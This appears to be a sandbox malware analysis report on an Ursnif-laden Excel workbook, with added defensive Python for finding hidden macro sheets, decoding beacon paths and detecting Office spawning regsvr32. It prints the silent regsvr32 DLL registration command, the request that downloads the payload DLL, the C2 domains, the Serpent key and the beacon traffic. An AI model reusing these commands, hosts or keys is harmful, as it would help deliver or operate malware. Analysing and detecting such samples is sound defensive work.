
Analysis Report 6613n246zm543w.xlsb

Overview

General Information

Sample Name: 6613n246zm543w.xlsb
Analysis ID: 403127
MD5: f5ac70a6e136e274a8856f244c9183b7
SHA1: 3991a3a8ec56ee8487ff17e226c49f2355b9d3ac
SHA256: 1f7a0472872d38133ce9fef933631d5110cf076ec44f344a95bd683e73fdbdc9
Tags: xlsb

Detection

Hidden Macro 4.0, Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
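The two Excel 4.0 signatures above ("Found Excel 4.0 Macro with suspicious formulas", "Found abnormal large hidden Excel 4.0 Macro sheet") boil down to one structural fact about the workbook: a macro sheet whose visibility flag is hidden or veryHidden. The following is an added example, not Joe Sandbox code, that extracts that fact from an .xlsb without Excel. It walks the BIFF12 record stream in xl/workbook.bin, decodes every BrtBundleSh record (one per sheet, record type 0x9C: hsState, iTabID, strRelID, strName) and resolves the relationship id through xl/_rels/workbook.bin.rels to see whether the sheet part lives under xl/macrosheets/. The workbook it runs on is constructed inside the block (a visible worksheet plus a veryHidden macro sheet); the relationship type URI used for the macro sheet in that constructed sample is the one Excel writes, but nothing here is taken from the analysed file.

```python
"""Find hidden/veryHidden sheets in an .xlsb and flag the ones that are
Excel 4.0 macro sheets. Added example; the sample workbook is constructed."""
import io
import struct
import xml.etree.ElementTree as ET
import zipfile

BRT_BUNDLE_SH = 0x9C                      # MS-XLSB BrtBundleSh, one per sheet
HS_STATE = {0: "visible", 1: "hidden", 2: "veryHidden"}
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def _read_varint7(buf, pos, max_bytes):
    """BIFF12 record type (1-2 bytes) and size (1-4 bytes): 7 data bits per
    byte, high bit set means another byte follows."""
    value, shift = 0, 0
    for _ in range(max_bytes):
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            break
    return value, pos


def _encode_varint7(value):
    out = bytearray()
    while True:
        b, value = value & 0x7F, value >> 7
        out.append(b | 0x80 if value else b)
        if not value:
            return bytes(out)


def iter_biff12_records(data):
    pos = 0
    while pos < len(data):
        rtype, pos = _read_varint7(data, pos, 2)
        size, pos = _read_varint7(data, pos, 4)
        yield rtype, data[pos:pos + size]
        pos += size


def _wide_string(payload, pos):
    """XLWideString: 4-byte character count then UTF-16LE; 0xFFFFFFFF = null."""
    (cch,) = struct.unpack_from("<I", payload, pos)
    pos += 4
    if cch == 0xFFFFFFFF:
        return None, pos
    return payload[pos:pos + 2 * cch].decode("utf-16-le"), pos + 2 * cch


def parse_bundle_sh(payload):
    hs_state, tab_id = struct.unpack_from("<II", payload, 0)
    rel_id, pos = _wide_string(payload, 8)
    name, _ = _wide_string(payload, pos)
    return {"name": name, "tab_id": tab_id, "rel_id": rel_id,
            "state": HS_STATE.get(hs_state, hex(hs_state))}


def sheet_report(xlsb_bytes):
    """One dict per sheet: visibility, part target, and whether it is a
    non-visible XLM macro sheet (the pattern this report flags)."""
    with zipfile.ZipFile(io.BytesIO(xlsb_bytes)) as z:
        workbook = z.read("xl/workbook.bin")
        rels = ET.fromstring(z.read("xl/_rels/workbook.bin.rels"))
    targets = {r.get("Id"): r.get("Target", "") for r in rels.iter(REL_NS + "Relationship")}
    report = []
    for rtype, payload in iter_biff12_records(workbook):
        if rtype != BRT_BUNDLE_SH:
            continue
        sheet = parse_bundle_sh(payload)
        sheet["target"] = targets.get(sheet["rel_id"], "")
        sheet["macro_sheet"] = "macrosheets/" in sheet["target"]
        sheet["suspicious"] = sheet["macro_sheet"] and sheet["state"] != "visible"
        report.append(sheet)
    return report


# --- constructed sample: one visible worksheet, one veryHidden XLM macro sheet
def _bundle_sh(hs_state, tab_id, rel_id, name):
    def ws(s):
        return struct.pack("<I", len(s)) + s.encode("utf-16-le")
    return struct.pack("<II", hs_state, tab_id) + ws(rel_id) + ws(name)


def _record(rtype, payload):
    return _encode_varint7(rtype) + _encode_varint7(len(payload)) + payload


def build_sample_xlsb():
    workbook = (_record(BRT_BUNDLE_SH, _bundle_sh(0, 1, "rId1", "Sheet1"))
                + _record(BRT_BUNDLE_SH, _bundle_sh(2, 2, "rId2", "Macro1")))
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.bin"/>'
        '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.bin"/>'
        "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.bin", workbook)
        z.writestr("xl/_rels/workbook.bin.rels", rels)
    return buf.getvalue()
```

Run `sheet_report(open("sample.xlsb", "rb").read())` on a real workbook; a veryHidden sheet whose target is under macrosheets/ is the same condition the sandbox's "hidden Excel 4.0 macro sheet" signature fires on, and a real workbook.bin contains many other record types, which the walker simply skips.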

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7148 cmdline: regsvr32 -s C:\Users\Public\block.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 1260 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6384 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4996 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5368 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

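The beacons sent to the c2_domain hosts (recorded under "HTTP traffic detected" in the signature section) carry the encrypted request in the URL path: long slash-separated segments containing the escapes _2B and _2F. The following added example, not part of the report and not Joe Sandbox's extractor, reverses the encoding of such a path back to the raw ciphertext. Ursnif base64-encodes the Serpent-encrypted beacon, replaces '+' with '_2B' and '/' with '_2F', then scatters '/' separators through the string (a separator may split an escape, as in `...NGo_/2BArU...`). Stripping the separators and undoing the escapes yields the ciphertext; decrypting it would need a Serpent-CBC implementation keyed with the serpent_key above and is not attempted here. The sample path is the one recorded for app.buboleinov.com; the padding rule is an assumption (Ursnif emits no '=' in these paths).

```python
"""Undo the path encoding of an Ursnif/ISFB C2 beacon. Added example."""
import base64
import binascii

# Beacon path recorded in this report for app.buboleinov.com, copied verbatim.
SAMPLE_PATH = (
    "/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS"
    "/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46"
    "/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH"
    "/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb"
    "/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH"
    "/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm"
)

SERPENT_BLOCK = 16          # Serpent is a 128-bit block cipher


def normalise_path(path):
    """Drop the separators first (they can fall inside an escape), then undo
    the '+'/'/' escapes. Returns standard base64 text."""
    text = path.replace("/", "")
    text = text.replace("_2B", "+").replace("_2F", "/")
    # Assumption: '=' padding was stripped by the encoder, so restore it.
    return text + "=" * (-len(text) % 4)


def decode_c2_path(path):
    """Ciphertext bytes, or None when the path does not fit the scheme."""
    try:
        return base64.b64decode(normalise_path(path), validate=True)
    except binascii.Error:
        return None


def looks_like_ursnif_beacon(path):
    """Triage rule for proxy-log sweeps: the path decodes cleanly to a whole
    number of Serpent blocks. Cheap, so confirm by decryption before acting."""
    data = decode_c2_path(path)
    return data is not None and len(data) > 0 and len(data) % SERPENT_BLOCK == 0


def beacon_summary(path):
    data = decode_c2_path(path)
    if data is None:
        return None
    return {"base64_len": len(normalise_path(path)),
            "ciphertext_len": len(data),
            "blocks": len(data) // SERPENT_BLOCK,
            "whole_blocks": len(data) % SERPENT_BLOCK == 0}
```

For the recorded path the normalised base64 is 320 characters, which decodes to 240 bytes, exactly 15 Serpent blocks; an ordinary path such as /presentation.dll fails the base64 check and is rejected.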
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 further entries are collapsed in the original report.) All listed dumps come from process 1 (regsvr32.exe) and the same memory region at 0x5098000, i.e. the Ursnif payload unpacked inside regsvr32.

            Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.regsvr32.exe.66db0000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.3.regsvr32.exe.41d8d29.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

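No Sigma rule matched, yet the Startup tree shows the textbook process chain for this sample: EXCEL.EXE (PID 6844) spawning regsvr32 with `-s C:\Users\Public\block.dll`. The following is an added example of the process-creation check a detection engineer would write for that chain; it is not a Sigma rule from the report and not Joe Sandbox code. Events are constructed here in a Sysmon-like shape (ParentImage, Image, CommandLine); those field names are an assumption about the telemetry source, and the first event mirrors the PID 6844 to 7148 relationship above.

```python
"""Flag an Office application spawning regsvr32 to register a DLL from a
user-writable directory. Added example; events are constructed."""
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Lower-case path fragments an unprivileged user can write to.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\", "\\appdata\\")
DLL_RE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.IGNORECASE)
SILENT_RE = re.compile(r"(?:^|\s)[-/]s(?=\s|$)", re.IGNORECASE)   # regsvr32 -s / /s


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dll_arguments(cmdline):
    """Every .dll argument, quoted or bare, on a regsvr32 command line."""
    return [quoted or bare for quoted, bare in DLL_RE.findall(cmdline)]


def is_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def evaluate(event):
    """None for events outside the pattern; otherwise a finding with severity."""
    if image_name(event["ParentImage"]) not in OFFICE_IMAGES:
        return None
    if image_name(event["Image"]) != "regsvr32.exe":
        return None
    dlls = dll_arguments(event["CommandLine"])
    writable = [d for d in dlls if is_user_writable(d)]
    return {
        "parent": image_name(event["ParentImage"]),
        "dlls": dlls,
        "silent": bool(SILENT_RE.search(event["CommandLine"])),
        # Office -> regsvr32 is abnormal on its own; a DLL outside Program
        # Files / System32 makes it the macro-dropper chain seen in this report.
        "severity": "high" if writable else "medium",
    }


def scan(events):
    hits = []
    for index, event in enumerate(events):
        finding = evaluate(event)
        if finding:
            hits.append((index, finding))
    return hits


# Constructed events; the first mirrors PIDs 6844 -> 7148 in the Startup tree.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32 -s C:\Users\Public\block.dll"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",          # installer, benign
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",                     # not regsvr32
     "CommandLine": r"cmd /c echo hello"},
]
```

Only the first event is reported, at high severity, because the DLL sits under C:\Users\Public; an Office-spawned regsvr32 pointing at a Program Files or System32 DLL would still surface at medium severity, which is the right default given how rarely Office legitimately registers COM servers.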
Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.regsvr32.exe.48494a0.2.raw.unpack | Malware Configuration Extractor: Ursnif (the configuration is the one listed in the Malware Configuration section above)
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\block.dll | ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll | ReversingLabs: Detection: 12%
(presentation[1].dll is the urlmon download-cache copy of presentation.dll; block.dll is the copy written to C:\Users\Public and registered with regsvr32.)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: block.dll.0.dr | Binary string: c:\Whether\class\156\Through\How.pdb (PDB path embedded in the dropped DLL)

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\block.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: presentation[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Read together, these four entries are the whole infection chain: the hidden Excel 4.0 macro calls URLDownloadToFileA to fetch presentation.dll (cached under INetCache), writes it to C:\Users\Public\block.dll and registers it with regsvr32 -s, which loads the Ursnif DLL inside regsvr32.exe, the process the configuration was extracted from. "Document exploit" is the sandbox's generic label for document-initiated behaviour; the report identifies no software vulnerability, the chain is driven by the macro sheet.
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 17:48:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 03 May 2021 13:17:32 GMTAccept-Ranges: bytesContent-Length: 312832Cache-Control: max-age=10800Expires: Mon, 03 May 2021 20:48:15 GMThost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 
60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
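The 200 OK above is the first-stage download: it announces Content-Type: application/x-msdownload and its body starts with the DOS and PE headers of presentation.dll (e_lfanew 0xE0, Machine 0x014c, four sections, Characteristics 0x2102, which includes IMAGE_FILE_DLL). The following added example, not part of the report, classifies a response by those body bytes rather than by the header, since a server can label the same file text/html. The sample response is constructed: its HTTP headers and the DOS/COFF header fields are copied from the capture, the DOS stub, Rich header and the rest of the 312832-byte body are omitted.

```python
"""Classify an HTTP response as an executable download by inspecting the
body for a PE header. Added example; the sample response is constructed."""
import struct
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}
PE_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def split_response(raw):
    """(status line, {lower-case header: value}, body) from a raw response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def pe_summary(body):
    """Header facts if body is a PE image, else None. Only the DOS header,
    PE signature and COFF file header are read, so truncated captures work."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, sections, stamp, _, _, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    magic = None
    if len(body) >= e_lfanew + 26:
        (magic,) = struct.unpack_from("<H", body, e_lfanew + 24)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": sections,
        "timestamp": stamp,
        "compiled": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "format": PE_MAGIC.get(magic, "unknown"),
    }


def classify(raw):
    status, headers, body = split_response(raw)
    pe = pe_summary(body)
    return {"status": status, "content_type": headers.get("content-type"),
            "pe": pe, "verdict": "executable download" if pe else "no PE header"}


# --- constructed sample; header fields copied from the captured response
SAMPLE_HEADERS = (b"HTTP/1.1 200 OK\r\n"
                  b"Server: Apache\r\n"
                  b"Content-Length: 312832\r\n"
                  b"Content-Type: application/x-msdownload\r\n\r\n")
# DOS header: 'MZ', e_lfanew = 0xE0 at offset 0x3C; the DOS stub and Rich
# header occupying 0x40-0xDF in the real file are zero-filled here.
DOS_HEADER = b"MZ" + bytes(0x3A) + struct.pack("<I", 0xE0) + bytes(0xE0 - 0x40)
# 'PE\0\0' + COFF header: Machine 0x014c, 4 sections, TimeDateStamp 0x606e48df,
# SizeOfOptionalHeader 0xe0, Characteristics 0x2102 (EXECUTABLE|32BIT|DLL),
# followed by the optional-header Magic 0x10b (PE32).
PE_HEADER = bytes.fromhex("50450000 4c01 0400 df486e60 00000000 00000000 e000 0221 0b01")
SAMPLE_RESPONSE = SAMPLE_HEADERS + DOS_HEADER + PE_HEADER
```

The COFF timestamp in the capture, 0x606e48df, decodes to 2021-04-08 00:05:51 UTC, a few weeks before the 3 May 2021 Last-Modified date the server reports; the is_dll flag matches the way the sample is used, since regsvr32 can only load a DLL.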
Source: global traffic | HTTP traffic detected (first-stage download; the User-Agent is the urlmon string, consistent with the URLDownloadToFileA signature above):
  GET /presentation.dll HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: docs.atu.ngr.mybluehost.me
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (Ursnif beacon to the first c2_domain entry; the Internet Explorer 11 User-Agent matches the iexplore.exe instances in the Startup tree):
  GET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: app.buboleinov.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (Ursnif beacon to the third c2_domain entry):
  GET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1
  Accept: text/html, application/xht+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: chat.billionady.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (Ursnif beacon to the fourth c2_domain entry):
  GET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: app3.maintorna.com
  Connection: Keep-Alive
Source: msapplication.xml0.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
